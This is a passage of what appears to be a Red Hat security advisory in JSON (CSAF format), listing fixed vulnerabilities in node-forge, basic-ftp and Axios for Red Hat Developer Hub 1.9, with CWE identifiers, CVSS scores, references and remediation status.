          "summary": "RHBZ#2452450",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452450"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33891",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33891"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023",
          "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
        }
      ],
      "release_date": "2026-03-27T20:43:37.725000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: node-forge: Denial of Service via infinite loop in BigInteger.modInverse()"
    },
    {
      "cve": "CVE-2026-33894",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:52.462999+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452464"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452464",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "category": "external",
          "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "release_date": "2026-03-27T20:45:49.583000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"
    },
    {
      "cve": "CVE-2026-33895",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:18.484291+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452457"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript library used for Transport Layer Security (TLS). The library\u0027s Ed25519 signature verification process does not correctly validate cryptographic signatures, allowing forged non-canonical signatures to be accepted. A remote attacker could exploit this signature malleability to bypass authentication and authorization logic. This vulnerability can also circumvent security checks in applications that rely on the uniqueness of cryptographic signatures for functions such as deduplication or preventing replay attacks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Authentication bypass via forged Ed25519 cryptographic signatures",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452457",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452457"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4",
          "url": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85",
          "url": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw"
        }
      ],
      "release_date": "2026-03-27T20:47:54.492000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Authentication bypass via forged Ed25519 cryptographic signatures"
    },
    {
      "cve": "CVE-2026-33896",
      "cwe": {
        "id": "CWE-295",
        "name": "Improper Certificate Validation"
      },
      "discovery_date": "2026-03-27T21:02:22.762233+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452458"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also known as node-forge), a JavaScript implementation of Transport Layer Security (TLS). The `pki.verifyCertificateChain()` function does not properly enforce certificate validation rules. This oversight allows an intermediate certificate that lacks specific security extensions to enable any leaf certificate to function as a Certificate Authority (CA) and sign other certificates. Consequently, node-forge could accept these unauthorized certificates as valid, potentially leading to spoofing or the issuance of illegitimate certificates.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge (node-forge): Certificate validation bypass allows unauthorized certificate issuance",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33896"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452458",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452458"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33896",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33896"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90",
          "url": "https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25"
        }
      ],
      "release_date": "2026-03-27T20:50:03.418000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge (node-forge): Certificate validation bypass allows unauthorized certificate issuance"
    },
    {
      "cve": "CVE-2026-39983",
      "cwe": {
        "id": "CWE-93",
        "name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
      },
      "discovery_date": "2026-04-09T18:02:16.209487+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456971"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in basic-ftp, an FTP client for Node.js. A remote attacker can exploit this vulnerability by injecting Carriage Return Line Feed (CRLF) sequences into file path parameters used by high-level APIs. This allows the attacker to split a single intended FTP command into multiple commands. Such command injection can lead to the execution of arbitrary commands, potentially compromising the integrity and availability of data or the system.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "basic-ftp: basic-ftp: Command injection via CRLF sequences in file path parameters",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-39983"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456971",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456971"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39983",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39983"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"
        },
        {
          "category": "external",
          "summary": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b",
          "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
        },
        {
          "category": "external",
          "summary": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1",
          "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
        },
        {
          "category": "external",
          "summary": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q",
          "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
        }
      ],
      "release_date": "2026-04-09T17:05:46.228000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "basic-ftp: basic-ftp: Command injection via CRLF sequences in file path parameters"
    },
    {
      "cve": "CVE-2026-40175",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-10T20:02:10.296601+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2457432"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, known as Prototype Pollution, can be exploited through a specific \"Gadget\" attack chain. This allows an attacker to escalate a Prototype Pollution vulnerability in a third-party dependency, potentially leading to remote code execution or a full cloud compromise, such as bypassing AWS IMDSv2.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Remote Code Execution via Prototype Pollution escalation",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The Axios library, a promise-based HTTP client, is susceptible to an Important prototype pollution vulnerability. This flaw, when combined with specific \"Gadget\" attack chains in third-party dependencies, can lead to remote code execution or full cloud compromise, including bypassing AWS IMDSv2.\n \nWith pollution check patch available in Axios gives an advantage, it remains vulnerable due to HTTP Header Sanitation and Server-Side Request Forgery threat.\n\nRed Hat products that incorporate the vulnerable Axios library are affected.\n\nThe openshift4/ose-monitoring-plugin-rhel9 container image is not vulnerable to this flaw. The affected component is used as a build-time dependency but it\u0027s not shipped in the final product, meaning the flaw is not present thus cannot be exploited in the container deployments.\n\nRegarding openshift4/ose-console for Product stream 4.12 and 4.13, the vulnerable component is present (indirect dependency), but the vulnerability is not exploitable in our case due to the browser runtime, where the required Node.js-specific attack vectors are not available. With this, the impact becomes low.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
